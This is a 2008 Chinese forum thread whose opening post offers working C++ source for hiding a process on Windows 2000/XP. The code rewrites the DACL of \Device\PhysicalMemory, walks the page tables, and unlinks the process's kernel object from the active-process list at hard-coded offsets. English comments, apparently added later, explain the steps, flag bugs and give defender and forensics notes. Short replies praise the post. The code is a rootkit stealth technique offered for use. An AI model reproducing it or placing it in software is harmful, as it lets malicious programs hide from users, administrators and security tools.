
标题: 在2000和xp下,隐藏进程,VC6.0测试通过!!! [打印本页]

作者: 噯伱╅詠吥變    时间: 2008-6-17 13:03     标题: 在2000和xp下,隐藏进程,VC6.0测试通过!!!

在2000和xp下,隐藏进程,VC6.0测试通过!!!


头文件
  //////////////////////////////////////
  //HideProcess.h
  // Public entry point of the module. Runs the hide routine at most once per
  // process (guarded by a static flag in HideProcess.cpp) and always returns
  // TRUE, so callers cannot tell from the return value whether it succeeded.
  BOOL HideProcess();
CPP源文件:
  1. /////////////////////////////////////////////////////////////////////////////
  2. //HideProcess.cpp
  3. #include<windows.h>
  4. #include<Accctrl.h>
  5. #include<Aclapi.h>

  6. #include"HideProcess.h"

  // Hand-copied subset of the native-API declarations (ntdef.h / ntddk.h),
  // presumably so the file builds with the Win32 SDK alone and no DDK headers.
  #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
  #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)   // defined but not referenced below
  #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)          // the only status OpenPhysicalMemory() tests for by value

  typedef LONG NTSTATUS;

  // Declared for completeness; nothing in this file references it.
  typedef struct _IO_STATUS_BLOCK
  {
      NTSTATUS Status;
      ULONG Information;
  } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

  // Counted UTF-16 string used by the native API; filled by RtlInitUnicodeString.
  typedef struct _UNICODE_STRING
  {
      USHORT Length;
      USHORT MaximumLength;
      PWSTR Buffer;
  } UNICODE_STRING, *PUNICODE_STRING;

  // OBJ_* attribute flags. None is used below: OpenPhysicalMemory() sets
  // OBJECT_ATTRIBUTES.Attributes to 0.
  #define OBJ_INHERIT                0x00000002L
  #define OBJ_PERMANENT            0x00000010L
  #define OBJ_EXCLUSIVE            0x00000020L
  #define OBJ_CASE_INSENSITIVE    0x00000040L
  #define OBJ_OPENIF                0x00000080L
  #define OBJ_OPENLINK            0x00000100L
  #define OBJ_KERNEL_HANDLE        0x00000200L
  #define OBJ_VALID_ATTRIBUTES    0x000003F2L

  // Object descriptor handed to ZwOpenSection (name + open flags).
  typedef struct _OBJECT_ATTRIBUTES
  {
      ULONG Length;
      HANDLE RootDirectory;
      PUNICODE_STRING ObjectName;
      ULONG Attributes;
      PVOID SecurityDescriptor;
      PVOID SecurityQualityOfService;
  } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

  // Signatures of the two ntdll exports that InitNTDLL() resolves at run time.
  typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
      OUT PHANDLE SectionHandle,
      IN ACCESS_MASK DesiredAccess,
      IN POBJECT_ATTRIBUTES ObjectAttributes
      );

  typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
      IN OUT PUNICODE_STRING DestinationString,
      IN PCWSTR SourceString
      );

  // Module-wide state. Call order matters: InitNTDLL() fills the two function
  // pointers, OpenPhysicalMemory() fills the rest, YHideProcess() reads them.
  RTLINITUNICODESTRING RtlInitUnicodeString;   // from ntdll; the GetProcAddress result is never NULL-checked
  ZWOPENSECTION ZwOpenSection;                 // from ntdll; likewise unchecked before the first call
  HMODULE g_hNtDLL = NULL;                     // ntdll.dll handle owned by InitNTDLL()/CloseNTDLL()
  PVOID g_pMapPhysicalMemory = NULL;           // 4 KB view of physical memory at PhyDirectory; LinearToPhys()
                                               // indexes it as a page directory. Never unmapped anywhere in this file.
  HANDLE g_hMPM = NULL;                        // handle to the \Device\PhysicalMemory section
  OSVERSIONINFO g_osvi;                        // filled by OpenPhysicalMemory(), re-read by YHideProcess()
  54. //---------------------------------------------------------------------------
  // Loads ntdll.dll and resolves the two native-API entry points used below.
  // Returns FALSE only when LoadLibrary fails. The two GetProcAddress results
  // are stored without a NULL check, so a missing export would only surface
  // later as a call through a NULL function pointer in OpenPhysicalMemory().
  BOOL InitNTDLL()
  {
      g_hNtDLL = LoadLibrary("ntdll.dll");

      if (NULL == g_hNtDLL)
          return FALSE;

      RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
      ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

      return TRUE;
  }
  65. //---------------------------------------------------------------------------
  // Releases the module handle taken by InitNTDLL(). Safe to call when nothing
  // was loaded. The two function pointers resolved from the module are not
  // reset, so they must not be used after this call.
  VOID CloseNTDLL()
  {
      if(NULL != g_hNtDLL)
          FreeLibrary(g_hNtDLL);

      g_hNtDLL = NULL;
  }
  72. //---------------------------------------------------------------------------
  // Widens the DACL of the \Device\PhysicalMemory section so the caller can
  // reopen it with SECTION_MAP_WRITE. hSection must have been opened with
  // READ_CONTROL|WRITE_DAC (OpenPhysicalMemory() does this on the retry path):
  // GetSecurityInfo reads the current DACL and SetSecurityInfo replaces it.
  //
  // Control-flow note: every error branch frees pSD/pNewDacl but does NOT
  // return, so a failed GetSecurityInfo still falls through to SetEntriesInAcl
  // (with pDacl == NULL) and on to SetSecurityInfo. On the success path nothing
  // is freed at all (LocalFree is only reached inside the error branches), and
  // the function reports no result to its caller.
  //
  // Defender note: a user-mode process rewriting the DACL of this kernel object
  // is abnormal; object-access auditing on the section can surface both the
  // WRITE_DAC open and the SetSecurityInfo call.
  VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
  {
      PACL pDacl                    = NULL;   // current DACL; points into pSD
      PSECURITY_DESCRIPTOR pSD    = NULL;     // returned by GetSecurityInfo, to be LocalFree'd
      PACL pNewDacl = NULL;                   // returned by SetEntriesInAcl, to be LocalFree'd

      DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD);

      if(ERROR_SUCCESS != dwRes)
      {
      // frees, then falls through to SetEntriesInAcl with pDacl == NULL
      if(pSD)
          LocalFree(pSD);
      if(pNewDacl)
          LocalFree(pNewDacl);
      }

      // One ACE granting SECTION_MAP_WRITE. The trustee is given by name rather
      // than SID; "CURRENT_USER" presumably resolves to the calling user.
      EXPLICIT_ACCESS ea;
      RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
      ea.grfAccessPermissions = SECTION_MAP_WRITE;
      ea.grfAccessMode = GRANT_ACCESS;
      ea.grfInheritance= NO_INHERITANCE;
      ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
      ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
      ea.Trustee.ptstrName = "CURRENT_USER";

      // merge the new ACE with the existing DACL into pNewDacl
      dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

      if(ERROR_SUCCESS != dwRes)
      {
      // frees, then falls through to SetSecurityInfo with pNewDacl == NULL
      if(pSD)
          LocalFree(pSD);
      if(pNewDacl)
          LocalFree(pNewDacl);
      }
      // write the merged DACL back onto the section object
      dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

      if(ERROR_SUCCESS != dwRes)
      {
      // error-only cleanup; on success both buffers leak
      if(pSD)
          LocalFree(pSD);
      if(pNewDacl)
          LocalFree(pNewDacl);
      }

  }
  116. //---------------------------------------------------------------------------
  // Opens \Device\PhysicalMemory for read/write and maps one 4 KB page of it
  // into g_pMapPhysicalMemory. Returns the section handle (also kept in g_hMPM)
  // or NULL on failure.
  //
  // Only NT 5.0 and 5.1 are accepted. PhyDirectory is a hard-coded physical
  // address per minor version (0x30000 on 2000, 0x39000 on XP per the original
  // comments) that the rest of the file treats as the location of the system
  // page directory: LinearToPhys() indexes the mapped page as an array of
  // page-directory entries. Nothing verifies that at run time, so a build or
  // service pack with a different layout would silently read the wrong page.
  //
  // If the first open fails with STATUS_ACCESS_DENIED, the section is reopened
  // with READ_CONTROL|WRITE_DAC, its DACL widened by
  // SetPhyscialMemorySectionCanBeWrited(), that handle closed, and the
  // read/write open retried. The status of the WRITE_DAC open itself is
  // overwritten without being checked.
  //
  // Defender note: later Windows releases removed user-mode access to this
  // object (I believe from Windows Server 2003 SP1 onward), so the approach is
  // limited to the two versions the gate below admits.
  HANDLE OpenPhysicalMemory()
  {
      NTSTATUS status;
      UNICODE_STRING physmemString;
      OBJECT_ATTRIBUTES attributes;
      ULONG PhyDirectory;   // physical address of the page the file will treat as the page directory

      g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
      GetVersionEx (&g_osvi);

      if (5 != g_osvi.dwMajorVersion)
          return NULL;

      switch(g_osvi.dwMinorVersion)
      {
          case 0:
              PhyDirectory = 0x30000;
              break; //2k
          case 1:
              PhyDirectory = 0x39000;
              break; //xp
          default:
              return NULL;
      }

      RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

      attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
      attributes.RootDirectory            = NULL;
      attributes.ObjectName                = &physmemString;
      attributes.Attributes                = 0;
      attributes.SecurityDescriptor        = NULL;
      attributes.SecurityQualityOfService    = NULL;

      status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

      if(status == STATUS_ACCESS_DENIED)
      {
          // retry path: obtain WRITE_DAC, loosen the DACL, then reopen for mapping
          status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
          SetPhyscialMemorySectionCanBeWrited(g_hMPM);
          CloseHandle(g_hMPM);
          status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
      }

      if(!NT_SUCCESS(status))
          return NULL;

      // map a single page starting at PhyDirectory; this view is never unmapped
      g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);

      if( g_pMapPhysicalMemory == NULL )
          return NULL;   // g_hMPM stays open

      return g_hMPM;
  }
  161. //---------------------------------------------------------------------------
  // Translates a virtual address to a physical address by walking the 32-bit,
  // non-PAE two-level page tables through the physical-memory section.
  // BaseAddress: mapped view of the page directory (g_pMapPhysicalMemory).
  // Returns the physical address, or 0 when the PDE or PTE present bit is clear.
  // 0 is also a legal physical address, so callers cannot distinguish
  // "not present" from "physical page 0" (GetData/SetData do not try to).
  //
  // Assumes 4-byte directory/table entries and the 10/10/12 index split
  // (non-PAE); with PAE enabled these indices and masks would not apply.
  PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
  {
      ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
      PGDE = BaseAddress[VAddr>>22];   // bits 31..22 index the page directory

      if (0 == (PGDE&1))   // bit 0: present
          return 0;

      ULONG tmp = PGDE & 0x00000080;   // bit 7: page-size flag (4 MB page)

      if (0 != tmp)
      {
          // large page: 4 MB frame base + 22-bit offset
          PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
      }
      else
      {
          // map the page table's physical page (4 is the value of FILE_MAP_READ);
          // the result is cast and indexed without a NULL check
          PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
          PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];   // bits 21..12 index the page table

          if (0 == (PTE&1))
              return 0;   // returns without UnmapViewOfFile: the view leaks on this path

          PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);   // 4 KB frame base + 12-bit offset
          UnmapViewOfFile((PVOID)PGDE);
      }

      return (PVOID)PAddr;
  }
  185. //---------------------------------------------------------------------------
  // Reads one 32-bit word at virtual address addr (kernel addresses included)
  // by translating it with LinearToPhys() and mapping the containing physical
  // page from the section. Returns 0 when the page cannot be mapped. A 0 from
  // LinearToPhys (not present) is not treated as an error; it results in a
  // read from physical page 0.
  ULONG GetData(PVOID addr)
  {
      ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
      // map the 4 KB page containing phys (read/write, although only a read follows)
      PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

      if (0 == tmp)
          return 0;

      ULONG ret = tmp[(phys & 0xFFF)>>2];   // dword index within the page
      UnmapViewOfFile(tmp);

      return ret;
  }
  198. //---------------------------------------------------------------------------
  // Writes one 32-bit word at virtual address addr through the physical-memory
  // section (mirror of GetData). Returns FALSE if the page cannot be mapped.
  // As in GetData, a failed translation (phys == 0) is not detected and would
  // write to physical page 0.
  BOOL SetData(PVOID addr,ULONG data)
  {
      ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
      PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

      if (0 == tmp)
          return FALSE;

      tmp[(phys & 0xFFF)>>2] = data;   // dword index within the page
      UnmapViewOfFile(tmp);

      return TRUE;
  }
  209. //---------------------------------------------------------------------------
  // Top-level exception filter: terminates the process silently instead of the
  // default unhandled-exception handling. Currently unused — the
  // SetUnhandledExceptionFilter(exeception) call in YHideProcess() is commented
  // out. The return statement is never reached after ExitProcess.
  long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
  {
     ExitProcess(0);
     return 1 ;
  }
  215. //---------------------------------------------------------------------------
  // The hide routine proper: direct kernel object manipulation from user mode.
  // It locates the kernel object of the current process and splices its list
  // entry out of a doubly linked list by rewriting the two neighbours' pointers
  // through the physical-memory section. Returns FALSE if ntdll or the section
  // could not be set up, TRUE otherwise (the SetData() results are ignored).
  //
  // Every address and offset is hard-coded for the two versions that
  // OpenPhysicalMemory() accepts: 0xFFDFF124 is read as the current thread's
  // kernel object ("kteb" in the original comment), +0x44 inside it as the
  // owning process object ("kpeb"), and the pair at +0xa0/+0xa4 (5.0) or
  // +0x88/+0x8c (5.1) as the entry's forward/back links. Any other build would
  // misread memory.
  //
  // The two SetData() calls are the standard unlink:
  //   next->Blink = bw   (written at fw + 4)
  //   prev->Flink = fw   (written at bw + 0)
  // The entry itself is neither modified nor freed, which is why
  // memory-forensics techniques that scan for the object instead of walking
  // the list, or that cross-check several enumerations, can still find it.
  BOOL YHideProcess()
  {
  //    SetUnhandledExceptionFilter(exeception);

      if (FALSE == InitNTDLL())
          return FALSE;

      if (0 == OpenPhysicalMemory())
          return FALSE;   // ntdll handle is left loaded on this path

      ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
      ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

      // fw/bw are only assigned for minor version 0 or 1; other versions were
      // already rejected by OpenPhysicalMemory(), so the uninitialized path is
      // unreachable in practice (the compiler will still warn).
      ULONG fw, bw;
      if (0 == g_osvi.dwMinorVersion)
      {
          fw = GetData(PVOID(process + 0xa0));
          bw = GetData(PVOID(process + 0xa4));
      }

      if (1 == g_osvi.dwMinorVersion)
      {
          fw = GetData(PVOID(process + 0x88));
          bw = GetData(PVOID(process + 0x8c));
      }

      SetData(PVOID(fw + 4), bw);   // next->Blink = bw
      SetData(PVOID(bw), fw);       // prev->Flink = fw

      CloseHandle(g_hMPM);   // g_pMapPhysicalMemory stays mapped
      CloseNTDLL();

      return TRUE;
  }

  // Public wrapper: runs YHideProcess() once per process lifetime. The static
  // guard is set before the call, so a second call never retries even if the
  // first attempt failed; the YHideProcess() result is discarded and the
  // function returns true on every path.
  BOOL HideProcess()
  {
  static BOOL b_hide = false;   // once-only guard (C++ true/false literals: this is a .cpp file)
  if (!b_hide)
  {
    b_hide = true;
    YHideProcess();
    return true;
  }
  return true;
  }

作者: Sun    时间: 2008-6-17 13:08

没有学过

希望楼主可以发个什么连载的教程就好了
作者: hilarylove    时间: 2008-11-27 12:31

好强大~是你自己写的吗??我砸写不出啊。。。汗
作者: 梦影    时间: 2008-11-27 15:58

不错的东东。



